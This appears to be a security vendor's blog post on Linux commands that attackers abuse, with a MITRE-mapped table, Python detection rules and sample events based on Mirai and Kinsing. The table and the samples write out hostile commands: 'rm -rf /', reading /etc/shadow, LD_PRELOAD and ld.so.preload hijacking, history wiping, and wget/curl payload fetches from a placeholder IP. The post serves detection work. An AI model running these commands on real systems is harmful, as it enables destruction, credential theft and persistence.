Uptycs' threat research team has observed several instances of Linux malware where the attackers leverage the inbuilt commands and utilities for a wide range of malicious activities.
In this post, we’ll take a look at the Linux commands and utilities commonly used by attackers and how you can use Uptycs EDR detection capabilities to find out whether they have been used in your environment.
Around since the mid-1990s and now spanning the globe, Linux is the operating system running most of the internet, all of the world’s top 500 supercomputers, the world’s stock exchanges, and most phones, thermostats, cars, refrigerators, Roku devices, and televisions. Alongside iOS and macOS, Linux is widely regarded as one of the most reliable, secure, and worry-free operating systems available for desktops, servers, and embedded systems. One example of Linux’s technological reach: the Android platform is powered by the Linux kernel.
Made up of components including the bootloader, kernel, init system, daemons, graphical server, desktop environment, and applications, Linux is ultimately chosen because it largely avoids viruses, malware, slow run times, crashes, costly repairs, and licensing fees; it is regarded as one of the most reliable computer ecosystems on the planet, with zero cost of entry.
A Linux command is a program or utility run from the command line: a directive to a text interface that accepts lines of text and turns them into instructions for the computer. Any graphical user interface (GUI) is just an abstraction over command-line programs.
Linux ships with many utilities and commands configured by default. Once an adversary gains access to a system, they can use these commands and utilities to get their malware loaded and running quickly, often with full system privileges. And because the same commands and utilities are used by legitimate users every day, it can be extremely difficult to tell malicious use from routine activity.
Using customer telemetry, MITRE ATT&CK mapping of detection alerts, threat intelligence systems, and our in-house osquery-based sandbox, we identified around 25 commands and utilities that are most commonly used by attackers.
Uptycs EDR has detected and identified malware abusing these commands and utilities under the following MITRE tactics:
We drill down and take a closer look at a few examples in the table below.
Using Uptycs EDR, we discovered the Linux commands most commonly used by attackers and mapped them to the techniques and tactics used by bad actors. Below is a list of commonly exploited commands and utilities.
| Command / Utility | Techniques | Tactics | Example |
| --- | --- | --- | --- |
| arp | Remote System Discovery | Discovery | arp -a |
| users | System Owner/User Discovery | Discovery | users |
| netstat | System Network Connections Discovery (Linux) | Discovery | netstat -plntu |
| uname | List OS Information | Discovery | uname -a |
| groups | Enumerate users and groups | Discovery | groups |
| tcpdump | Packet Capture (Linux) | Discovery | tcpdump -n > output |
| LD_PRELOAD=#{path_to_shared_library} ls | Shared Library Injection via LD_PRELOAD | Persistence, Privilege Escalation, Defense Evasion | LD_PRELOAD="/tmp/wqs.so" /bin/ls |
| insmod | Loadable Kernel Module based Rootkit | Persistence | sudo insmod rootkit.ko |
| modprobe | Loadable Kernel Module based Rootkit | Persistence | sudo modprobe -r rootkit.ko |
| useradd | Create a user account on a Linux system | Persistence | useradd -g 500 -u 500 -s /usr/local/bin/nocando -d /var/spool/vmail |
| crontab | Schedule task/job using cron | Persistence | crontab - |
| rm | Delete Filesystem / Delete Log Files (Linux) | Impact | rm -rf / --no-preserve-root; rm -rf /var/logs |
| kill/pkill | Kill EDR processes | Impact | kill -9 1234 |
| lsmod | Linux VM Check via Kernel Modules | Defense Evasion | sudo lsmod \| grep -i "vboxsf\|vboxguest" |
| systemctl | Stop EDR services on Linux | Defense Evasion | systemctl stop daemon |
| curl | Malicious User Agents | Command and Control | curl -XPOST #{base64_data}.#{destination_url} |
| wget | Ingress Tool Transfer | Command and Control | wget http://{IP}:1337/file.sh |
| chattr | File attributes/permissions modification | Defense Evasion | chattr -i /etc/ld.so.preload |
| /etc/shadow | Access /etc/shadow (Local) | Persistence, Credential Access | sudo cat /etc/shadow > file |
| /etc/passwd | Access /etc/passwd (Local) / Enumerate all accounts | Persistence | cat /etc/passwd > file |
| ~/.bash_history | Clear Bash history / Access Bash history | Credential Access, Defense Evasion | echo "" > ~/.bash_history |
| /etc/sudoers | View sudoers access | Privilege Escalation | vim /etc/sudoers |
| ~/.bashrc | .bash_profile and .bashrc | Persistence | echo "/tmp/qwer" >> ~/.bashrc |
| ~/.bash_profile | .bash_profile and .bashrc | Persistence | echo "/tmp/qwer" >> ~/.bash_profile |
| /etc/ld.so.preload | Hijack Execution Flow | Persistence, Privilege Escalation, Defense Evasion | echo "/tmp/a.so" >> /etc/ld.so.preload |

Table: Commonly exploited Linux commands/utilities
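To show how the table translates into detection logic, here is an added example (written for this post, not Uptycs' own event rules) that runs a set of command-line regexes distilled from the table over constructed process-execution records and tags each hit with its technique and tactic. The regexes, the event format, and the sample command lines (including the 198.51.100.7 address and the /tmp paths) are this example's own assumptions; the "Malicious User Agents" row is omitted because a user-agent check needs the HTTP header rather than the command line.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Rules distilled from the table above: (rule name, technique, tactic, regex on the full
# command line). The patterns are this example's approximations, not Uptycs rules.
RULES = [
    (name, technique, tactic, re.compile(pattern))
    for name, technique, tactic, pattern in [
        ("arp", "Remote System Discovery", "Discovery", r"^(?:sudo\s+)?arp\b"),
        ("users", "System Owner/User Discovery", "Discovery", r"^users\b"),
        ("netstat", "System Network Connections Discovery", "Discovery", r"^netstat\b"),
        ("uname", "List OS Information", "Discovery", r"^uname\b"),
        ("groups", "Enumerate users and groups", "Discovery", r"^groups\b"),
        ("tcpdump", "Packet Capture", "Discovery", r"^(?:sudo\s+)?tcpdump\b"),
        ("LD_PRELOAD", "Shared Library Injection via LD_PRELOAD",
         "Persistence, Privilege Escalation, Defense Evasion", r"\bLD_PRELOAD=\S+"),
        ("insmod/modprobe", "Loadable Kernel Module based Rootkit", "Persistence",
         r"\b(?:insmod|modprobe)\b"),
        ("useradd", "Create a user account", "Persistence", r"^(?:sudo\s+)?useradd\b"),
        ("crontab", "Schedule task/job using cron", "Persistence", r"\bcrontab\b"),
        # Only recursive deletes of / or the log directory, not every rm.
        ("rm", "Delete Filesystem / Delete Log Files", "Impact",
         r"\brm\s+-\w*r\w*\s+(?:/(?:\s|$)|/var/log)"),
        ("kill/pkill", "Kill EDR processes", "Impact", r"^(?:sudo\s+)?p?kill\b"),
        ("lsmod", "Linux VM Check via Kernel Modules", "Defense Evasion", r"\blsmod\b"),
        ("systemctl", "Stop EDR services", "Defense Evasion", r"\bsystemctl\s+stop\b"),
        # Ingress tool transfer from a bare IP literal (heuristic chosen for this example).
        ("curl/wget", "Ingress Tool Transfer", "Command and Control",
         r"\b(?:curl|wget)\b.*https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/"),
        ("chattr", "File attributes/permissions modification", "Defense Evasion",
         r"\bchattr\s+[-+]i\b"),
        ("/etc/shadow", "Access /etc/shadow", "Persistence, Credential Access", r"/etc/shadow\b"),
        ("ld.so.preload", "Hijack Execution Flow",
         "Persistence, Privilege Escalation, Defense Evasion", r"/etc/ld\.so\.preload\b"),
        ("bash_history", "Clear/Access Bash history",
         "Credential Access, Defense Evasion", r"\.bash_history\b"),
        ("shell rc", ".bash_profile and .bashrc", "Persistence",
         r">>?\s*\S*\.(?:bashrc|bash_profile)\b"),
        ("sudoers", "View sudoers access", "Privilege Escalation", r"/etc/sudoers\b"),
    ]
]


def classify(cmdline: str) -> List[Tuple[str, str, str]]:
    """Return (rule name, technique, tactic) for every rule the command line matches.

    A single line can hit several rules (e.g. chattr -i /etc/ld.so.preload hits both the
    chattr rule and the ld.so.preload rule), which is the desired behaviour.
    """
    return [(name, technique, tactic)
            for name, technique, tactic, rx in RULES if rx.search(cmdline)]


def scan(events: Iterable[Dict]) -> List[Dict]:
    """Run classify() over process events ({'pid', 'user', 'cmdline'}) and return alert rows."""
    alerts = []
    for ev in events:
        for name, technique, tactic in classify(ev["cmdline"]):
            alerts.append({"pid": ev["pid"], "user": ev["user"], "rule": name,
                           "technique": technique, "tactic": tactic,
                           "cmdline": ev["cmdline"]})
    return alerts


# Constructed sample events (hypothetical pids, users and command lines).
SAMPLE_EVENTS = [
    {"pid": 4101, "user": "www-data", "cmdline": "uname -a"},
    {"pid": 4102, "user": "www-data", "cmdline": "netstat -plntu"},
    {"pid": 4103, "user": "www-data", "cmdline": "wget http://198.51.100.7:1337/file.sh"},
    {"pid": 4104, "user": "root", "cmdline": 'sh -c "echo /tmp/a.so >> /etc/ld.so.preload"'},
    {"pid": 4105, "user": "root", "cmdline": "chattr -i /etc/ld.so.preload"},
    {"pid": 4106, "user": "root", "cmdline": 'LD_PRELOAD="/tmp/wqs.so" /bin/ls'},
    {"pid": 4107, "user": "root", "cmdline": "rm -rf /var/logs"},
    {"pid": 4108, "user": "alice", "cmdline": "ls -la /home/alice"},        # benign
    {"pid": 4109, "user": "alice", "cmdline": "grep -r pattern /srv/app"},  # benign
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f'pid={a["pid"]} user={a["user"]} [{a["tactic"]}] {a["technique"]}: {a["cmdline"]}')
```

Note that the rules are anchored on the program name where the command is short and common (arp, users, kill) and on a path or argument where the program alone is too noisy (rm, systemctl, curl/wget); the benign ls and grep lines in the sample produce no alert, while the `sh -c` line is caught because the full command line, not just the program name, is inspected.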
Here’s a closer look at some of the most recent and commonly seen malware using the above commands and utilities.
Mirai is malware that turns networked devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks. In the attack kill chain, the adversary downloads the initial shell script on the target system, which then executes wget and curl to drop the Mirai binaries for different architectures and executes them. (See Figure 1)
Figure 1: Mirai malware executing wget and curl activities.
Uptycs EDR detected the curl and wget activities performed by the malware and also the process activity of Mirai. (See Figure 2)
Figure 2: Uptycs Detection for wget and curl activities by Mirai.
Kinsing is malware that targets misconfigured Docker services and infects them to run crypto miners. The initial phase of the malware downloads and executes a shell script, which then modifies /etc/ld.so.preload and also executes crontab to achieve persistence. (See Figures 3 and 4)
Uptycs EDR detected the Kinsing malware executing the crontab and chattr commands for persistence and defense evasion. (See Figure 5)
In addition to the Linux commands and utilities used by Mirai and Kinsing, Uptycs EDR also labelled the threat through process scanning with a 10/10 risk score.
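The Mirai and Kinsing descriptions above are sequences rather than single commands: a script fetching a binary and then running it, and a write to /etc/ld.so.preload followed by chattr and crontab. As an added example (not Uptycs' code), the block below correlates constructed process events by parent process and flags those two chains. The event fields, the 300-second window, the stage names and all sample values (the 198.51.100.7 address, /tmp paths, pids) are this example's own assumptions.

```python
import os
import re
from collections import defaultdict
from typing import Dict, List, Set

URL_RE = re.compile(r"https?://\S+/([^\s/?\"']+)")   # last path element of the URL
OUTFILE_RE = re.compile(r"\s-[oO]\s+(\S+)")          # curl -o / wget -O output target


def tag(cmdline: str) -> Set[str]:
    """Coarse stage labels for one command line (this example's own taxonomy)."""
    tags = set()
    if re.search(r"\b(?:curl|wget)\b", cmdline) and URL_RE.search(cmdline):
        tags.add("download")
    if re.search(r">>?\s*/etc/ld\.so\.preload\b", cmdline):
        tags.add("preload_write")
    if re.search(r"\bchattr\s+[-+]i\b", cmdline):
        tags.add("chattr")
    if re.search(r"\bcrontab\b", cmdline):
        tags.add("cron")
    return tags


def downloaded_name(cmdline: str) -> str:
    """Basename the fetched file gets on disk: the -o/-O target if given, else the URL's last element."""
    m = OUTFILE_RE.search(cmdline)
    if m:
        return os.path.basename(m.group(1))
    m = URL_RE.search(cmdline)
    return m.group(1) if m else ""


def exec_basename(cmdline: str) -> str:
    """Basename of the program token, skipping leading VAR=value assignments such as LD_PRELOAD=..."""
    for tok in cmdline.split():
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", tok):
            continue
        return os.path.basename(tok)
    return ""


def correlate(events: List[Dict], window: int = 300) -> List[Dict]:
    """Group events by parent pid and look for download-then-execute and persistence chains."""
    by_parent: Dict[int, List[Dict]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_parent[ev["ppid"]].append(ev)
    alerts = []
    for ppid, evs in by_parent.items():
        pending: Dict[str, int] = {}   # downloaded basename -> timestamp of the download
        stages: List[tuple] = []       # (timestamp, persistence stage) seen under this parent
        for ev in evs:
            tags = tag(ev["cmdline"])
            if "download" in tags:
                pending[downloaded_name(ev["cmdline"])] = ev["ts"]
            else:
                name = exec_basename(ev["cmdline"])
                if name in pending and ev["ts"] - pending[name] <= window:
                    alerts.append({"rule": "download-then-execute", "ppid": ppid,
                                   "pid": ev["pid"], "file": name})
            for s in tags & {"preload_write", "chattr", "cron"}:
                stages.append((ev["ts"], s))
        # Two or more distinct persistence stages under one parent inside the window.
        distinct = sorted({s for _, s in stages})
        if len(distinct) >= 2 and stages[-1][0] - stages[0][0] <= window:
            alerts.append({"rule": "persistence-chain", "ppid": ppid, "stages": distinct})
    return alerts


# Constructed sample events: a Mirai-style dropper (ppid 2000), a Kinsing-style
# persistence script (ppid 3000) and a benign admin shell (ppid 4000).
SAMPLE_EVENTS = [
    {"ts": 100, "pid": 2001, "ppid": 2000, "cmdline": "wget http://198.51.100.7:1337/bins/mips -O /tmp/mips"},
    {"ts": 101, "pid": 2002, "ppid": 2000, "cmdline": "chmod +x /tmp/mips"},
    {"ts": 102, "pid": 2003, "ppid": 2000, "cmdline": "/tmp/mips"},
    {"ts": 103, "pid": 2004, "ppid": 2000, "cmdline": "curl -s http://198.51.100.7:1337/bins/arm7 -o /tmp/arm7"},
    {"ts": 104, "pid": 2005, "ppid": 2000, "cmdline": "/tmp/arm7"},
    {"ts": 200, "pid": 3001, "ppid": 3000, "cmdline": 'sh -c "echo /tmp/libsystem.so >> /etc/ld.so.preload"'},
    {"ts": 201, "pid": 3002, "ppid": 3000, "cmdline": "chattr +i /etc/ld.so.preload"},
    {"ts": 202, "pid": 3003, "ppid": 3000, "cmdline": "crontab -"},
    {"ts": 300, "pid": 4001, "ppid": 4000, "cmdline": "wget https://example.com/releases/notes.txt -O /tmp/notes.txt"},
    {"ts": 301, "pid": 4002, "ppid": 4000, "cmdline": "less /tmp/notes.txt"},
    {"ts": 302, "pid": 4003, "ppid": 4000, "cmdline": "crontab -l"},
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a)
```

The benign parent downloads a file and runs crontab too, but never executes what it fetched and only touches one persistence stage, so it raises nothing; the download rule keys on the on-disk basename (honouring -o/-O) so a fetch renamed on the way down is still linked to its later execution.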
Most Linux servers are used for hosting services and are mostly accessed over SSH. If SSH is not configured properly, adversaries may gain access to servers using various techniques, such as exploiting weak credentials. Once adversaries have access to the target system, their initial goal is to extract system information for later stages such as exploitation, privilege escalation, or persistence. Commands like uname, users, groups, and netstat are the ones most commonly used for this initial reconnaissance.
Uptycs EDR detects the post-login activity that follows a successful SSH login on our target system. (See Figure 6)
Figure 6: Uptycs Detection for Discovery Techniques.
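The discovery commands above are individually harmless, so a useful detection looks at how many distinct ones a single SSH session runs in a short time. The added example below (written for this post, not an Uptycs rule) groups constructed command events by SSH session and alerts when a session runs three or more of the table's discovery commands within two minutes. The session identifiers, user names, source addresses, threshold and window are all this example's own assumptions.

```python
from collections import defaultdict
from typing import Dict, List

# Discovery commands taken from the table above, keyed by program name.
DISCOVERY = {"arp", "users", "netstat", "uname", "groups", "tcpdump"}


def program(cmdline: str) -> str:
    """Program name of a command line, with a leading sudo and any directory prefix stripped."""
    toks = cmdline.split()
    if toks and toks[0] == "sudo":
        toks = toks[1:]
    return toks[0].rsplit("/", 1)[-1] if toks else ""


def discovery_bursts(events: List[Dict], threshold: int = 3, window: int = 120) -> List[Dict]:
    """Flag sessions that run at least `threshold` distinct discovery commands within `window` seconds."""
    per_session: Dict[str, List[tuple]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        prog = program(ev["cmdline"])
        if prog in DISCOVERY:
            per_session[ev["session"]].append((ev["ts"], prog, ev["user"], ev["src_ip"]))
    alerts = []
    for session, rows in per_session.items():
        for i, (t0, _, user, src) in enumerate(rows):
            # Distinct discovery programs seen in the window that opens at this command.
            seen = {p for t, p, _, _ in rows[i:] if t - t0 <= window}
            if len(seen) >= threshold:
                alerts.append({"session": session, "user": user, "src_ip": src,
                               "start": t0, "commands": sorted(seen)})
                break  # one alert per session is enough
    return alerts


# Constructed sample events: a rapid reconnaissance burst in sess-A and a slow,
# routine admin session in sess-B (hypothetical users and addresses).
SAMPLE_SESSION_EVENTS = [
    {"ts": 1000, "session": "sess-A", "user": "deploy", "src_ip": "203.0.113.5", "cmdline": "uname -a"},
    {"ts": 1005, "session": "sess-A", "user": "deploy", "src_ip": "203.0.113.5", "cmdline": "users"},
    {"ts": 1012, "session": "sess-A", "user": "deploy", "src_ip": "203.0.113.5", "cmdline": "groups"},
    {"ts": 1030, "session": "sess-A", "user": "deploy", "src_ip": "203.0.113.5", "cmdline": "netstat -plntu"},
    {"ts": 2000, "session": "sess-B", "user": "admin", "src_ip": "198.51.100.20", "cmdline": "uname -a"},
    {"ts": 3000, "session": "sess-B", "user": "admin", "src_ip": "198.51.100.20", "cmdline": "netstat -plntu"},
    {"ts": 3010, "session": "sess-B", "user": "admin", "src_ip": "198.51.100.20", "cmdline": "/usr/bin/groups"},
]

if __name__ == "__main__":
    for a in discovery_bursts(SAMPLE_SESSION_EVENTS):
        print(f'{a["session"]} {a["user"]}@{a["src_ip"]} ran {a["commands"]} from t={a["start"]}')
```

With the defaults only sess-A fires; tightening the window to 60 seconds but lowering the threshold to two commands also catches the netstat/groups pair in sess-B, which is the trade-off to tune against an environment's normal administrative behaviour.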
Because these Linux commands are used in daily operations, their use for malicious activity is often left unnoticed and stays under the radar. Linux enterprise administrators should regularly monitor the commands in the list above for any suspicious or malicious activity on their systems. Current Uptycs customers can see a full list of Event Rules below.
The following Uptycs EDR rules are already available to customers to detect the above-mentioned techniques: